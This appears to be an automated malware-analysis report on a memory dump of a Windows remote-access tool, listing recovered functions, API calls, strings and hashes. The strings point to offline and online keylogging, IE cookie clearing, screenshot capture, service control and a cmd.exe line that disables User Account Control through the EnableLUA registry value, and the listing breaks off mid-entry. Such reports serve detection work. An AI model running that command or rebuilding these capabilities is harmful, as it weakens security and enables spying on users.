SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
SendInput.USER32(00000001,?,0000001C,?), ref: 00415376

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00410305, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374filesleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323

Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,7519FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA

Part of subcall function 0041432B: CloseHandle.KERNEL32(004041F6,?,004041F6,0045F464), ref: 00414341
Part of subcall function 0041432B: CloseHandle.KERNEL32(0045F464,?,004041F6,0045F464), ref: 0041434A

DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105D6
DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 00410604
Sleep.KERNEL32(000001F4,0045F464,0045F464,0045F464), ref: 0041061D

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

/stext ", xrefs: 004103DD, 004103E3, 0041046F, 004104FB

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
String ID: /stext "
API String ID: 1351907930-3856184850
Opcode ID: 7f364b6bc4c442b28ae900f15efb8b9cafff702cbe6493c4fbee87e885f413c0
Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
Opcode Fuzzy Hash: 7f364b6bc4c442b28ae900f15efb8b9cafff702cbe6493c4fbee87e885f413c0
Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A409, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
Part of subcall function 004108E2: RegCloseKey.ADVAPI32(?), ref: 0041092C

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
PathFileExistsA.SHLWAPI(?), ref: 0040A498

Strings

[IE cookies not found], xrefs: 0040A460
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040A422
Cookies, xrefs: 0040A41D
[IE cookies cleared!], xrefs: 0040A4E5, 0040A501

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 518f696caf34a80e50aed5e85b550f5397911344afae7d95c44acabde01ece65
Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
Opcode Fuzzy Hash: 518f696caf34a80e50aed5e85b550f5397911344afae7d95c44acabde01ece65
Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A

Uniqueness

Uniqueness Score: -1.00%

Function 004501D3, Relevance: 10.6, APIs: 7, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
Opcode Fuzzy Hash: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7E5, Relevance: 10.6, APIs: 7, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040E7F2
int.LIBCPMT ref: 0040E805

Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977

std::locale::_Getfacet.LIBCPMT ref: 0040E80E
std::_Facet_Register.LIBCPMT ref: 0040E845
std::_Lockit::~_Lockit.LIBCPMT ref: 0040E84E
__CxxThrowException@8.LIBVCRUNTIME ref: 0040E86C
__Init_thread_footer.LIBCMT ref: 0040E8AD

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
String ID:
API String ID: 2409581025-0
Opcode ID: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
Instruction ID: 03fd642756e00294ec4acf8aadaa37b4638c280f2e7f5516d862d72f379d1b29
Opcode Fuzzy Hash: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
Instruction Fuzzy Hash: 7C21D332E001149BC714FB69D906A9E77B8DB44724B60417FE800B72D2EB78AD01879E

Uniqueness

Uniqueness Score: -1.00%

Function 00409634, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

wsprintfW.USER32 ref: 004096C3
SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040964B
Offline Keylogger Started, xrefs: 0040963B
], xrefs: 00409650

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EventLocalTimechar_traitswsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 3003339404-248792730
Opcode ID: a464e92bc26aa4ab2780b6b025da8351db48c38763fc5baacaee56a9816591fb
Instruction ID: dd13208d924f003fd79d0c2a63de2e9b71645c7df6fae77663c0b624719a6389
Opcode Fuzzy Hash: a464e92bc26aa4ab2780b6b025da8351db48c38763fc5baacaee56a9816591fb
Instruction Fuzzy Hash: 7021A4724001186AC728EBA5EC958FF77B9AF08355F00413FF847621D2EE78AA45D768

Uniqueness

Uniqueness Score: -1.00%

Function 0044917A, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA

_free.LIBCMT ref: 004491C8

Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 004491D3
_free.LIBCMT ref: 004491DE
_free.LIBCMT ref: 00449232
_free.LIBCMT ref: 0044923D
_free.LIBCMT ref: 00449248
_free.LIBCMT ref: 00449253

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658

Uniqueness

Uniqueness Score: -1.00%

Function 004350B5, Relevance: 10.6, APIs: 7, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 848315947e7627a59a283f1dea598c5d8ffdd06732940a2b65acc7d6341128d4
Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
Opcode Fuzzy Hash: 848315947e7627a59a283f1dea598c5d8ffdd06732940a2b65acc7d6341128d4
Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E

Uniqueness

Uniqueness Score: -1.00%

Function 0040511B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405159
SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405165
WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405170
CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405179

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

Strings

Connection KeepAlive disabled, xrefs: 00405132
[WARNING], xrefs: 00405141

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive disabled$[WARNING]
API String ID: 2993684571-804309475
Opcode ID: 76a279513c8000d45bb1d856bce9f14881a2df12ec43bda3983b3d9b034b403d
Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
Opcode Fuzzy Hash: 76a279513c8000d45bb1d856bce9f14881a2df12ec43bda3983b3d9b034b403d
Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416737, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416769
PlaySoundW.WINMM(00000000,00000000), ref: 00416777
Sleep.KERNEL32(00002710), ref: 0041677E
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416787

Strings

Alarm has been triggered!, xrefs: 00416740
[ALARM], xrefs: 0041674F

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm has been triggered!$[ALARM]
API String ID: 614609389-1190268461
Opcode ID: 126c17d4f44cec584df51f8685eff76a9cf7ee81dfadadc3ed7876a48e9b8e0e
Instruction ID: 3dbfa3bc3acc833274b6e0f43357c326849184f6c95de14e1e3858e62b15b156
Opcode Fuzzy Hash: 126c17d4f44cec584df51f8685eff76a9cf7ee81dfadadc3ed7876a48e9b8e0e
Instruction Fuzzy Hash: D9E09222A00221379514376A6D0FD6F3D28CAC2B62B01016FFE08661829D944810C6FB

Uniqueness

Uniqueness Score: -1.00%

Function 00435799, Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00435926
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435942
__allrem.LIBCMT ref: 00435959
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435977
__allrem.LIBCMT ref: 0043598E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004359AC

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
Instruction ID: 35372c1425533dcebe3bda436374fdb164c2facb18fb88ba24de970f82e87be5
Opcode Fuzzy Hash: 258e57513f608f90b5a19f46d233bda83a55d4bc811eeb716edfff4965c679b3
Instruction Fuzzy Hash: 4D810972600F06ABE724AE69CC42B6B73E8AF49778F24552FF411D7681E77CD9008798

Uniqueness

Uniqueness Score: -1.00%

Function 0043F14E, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0043F17A
__cftoe.LIBCMT ref: 0043F1AC

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 490f4ba34fb9445138f821c7b04b278817217b66baaba8d1fac780bd761cbd39
Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
Opcode Fuzzy Hash: 490f4ba34fb9445138f821c7b04b278817217b66baaba8d1fac780bd761cbd39
Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041640B, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9

Uniqueness

Uniqueness Score: -1.00%

Function 00416576, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041576E, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D

SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7

Part of subcall function 0041441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414431

Part of subcall function 00414493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004144A4

Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9

DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858

Strings

image/png, xrefs: 004157E1
dat, xrefs: 004158A4
png, xrefs: 00415781

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
String ID: dat$image/png$png
API String ID: 1095564277-186023265
Opcode ID: 294e0575d5c3f3df68874ed8cc6bd497170dbf286b6d4102a3bd0dde0a790e21
Instruction ID: 0c36451510116b7bd957a4aa3b7b106e47bf9e8d8c5c7fe72891902c2c8ac275
Opcode Fuzzy Hash: 294e0575d5c3f3df68874ed8cc6bd497170dbf286b6d4102a3bd0dde0a790e21
Instruction Fuzzy Hash: 304172711183409BC314FB62C852EEFB3A9AF95358F00093FF446671E2EF385A48C69A

Uniqueness

Uniqueness Score: -1.00%

Function 00408742, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 004087CA
CreateThread.KERNEL32 ref: 004087DA
CreateThread.KERNEL32 ref: 004087E6

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

Offline Keylogger Started, xrefs: 00408767, 0040876E, 0040879B
[Info], xrefs: 004087A6

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread$EventLocalTimewsprintf
String ID: Offline Keylogger Started$[Info]
API String ID: 3534694722-3531117058
Opcode ID: 9351ce93166e5919873b59e2be7c86dd049733ec4517a2a82178660fdbeb4b66
Instruction ID: e7dd77b1288fa42652556686635590a3b19cb298011fac88deeca58e0b290907
Opcode Fuzzy Hash: 9351ce93166e5919873b59e2be7c86dd049733ec4517a2a82178660fdbeb4b66
Instruction Fuzzy Hash: 5711A7B21003083AD214B6668D86DBB3A5CDA9139CB40053FF985221D3EE785E59C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 004093AD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

CreateThread.KERNEL32 ref: 0040942D
CreateThread.KERNEL32 ref: 00409439
CreateThread.KERNEL32 ref: 00409445

Strings

Online Keylogger Started, xrefs: 004093C2, 004093CB, 004093F5
[Info], xrefs: 00409400

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread$LocalTime$Eventwsprintf
String ID: Online Keylogger Started$[Info]
API String ID: 3546759147-3401407043
Opcode ID: a2041c6c2a2a3a2c9e5274fc0c7bccf85df625937437c628581770fe62eddfb0
Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
Opcode Fuzzy Hash: a2041c6c2a2a3a2c9e5274fc0c7bccf85df625937437c628581770fe62eddfb0
Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3F7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32 ref: 0040D43B
CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
CloseHandle.KERNEL32(00000027), ref: 0040D44F

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431
C:\Windows\System32\cmd.exe, xrefs: 0040D436

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040519B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
CloseHandle.KERNEL32(?), ref: 00405207
SetEvent.KERNEL32(?), ref: 00405216

Strings

Connection timeout, xrefs: 004051D6
[WARNING], xrefs: 004051E5

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection timeout$[WARNING]
API String ID: 2055531096-1470507543
Opcode ID: 8b6936126bbdbf1623cb9cbc7df53c6cf8ce2eb3c326d1d004a7b873d990a03d
Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
Opcode Fuzzy Hash: 8b6936126bbdbf1623cb9cbc7df53c6cf8ce2eb3c326d1d004a7b873d990a03d
Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004126DB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041271D

Strings

8E@, xrefs: 004133C4
open, xrefs: 00412717
/C , xrefs: 004126FB
cmd.exe, xrefs: 00412712

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $8E@$cmd.exe$open
API String ID: 587946157-914314769
Opcode ID: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
Instruction ID: 47ea0f4151d847ad7c85bc2547405b4448f03a7c8d467b7d431ad20f766adf74
Opcode Fuzzy Hash: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
Instruction Fuzzy Hash: 6BF036711183415BC204FB72D8919BFB3A9AB90309F10083FB946A20E3EF385919865E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B82B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040B836
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B875

Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303BF
Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303E3

std::bad_exception::bad_exception.LIBCMT ref: 0040B88D
__CxxThrowException@8.LIBVCRUNTIME ref: 0040B89B

Strings

bad locale name, xrefs: 0040B885

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 3706160523-1405518554
Opcode ID: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
Instruction ID: 089b12ecbc6339823181e46ec4ed0a9302f8c45fa17c933d22815baa8faf1e53
Opcode Fuzzy Hash: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
Instruction Fuzzy Hash: 1DF031318042086BC228FAA5ED57A9A7374AF14754F50463FF946224D1EF7CB54DC68D

Uniqueness

Uniqueness Score: -1.00%

Function 0043B2BA, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
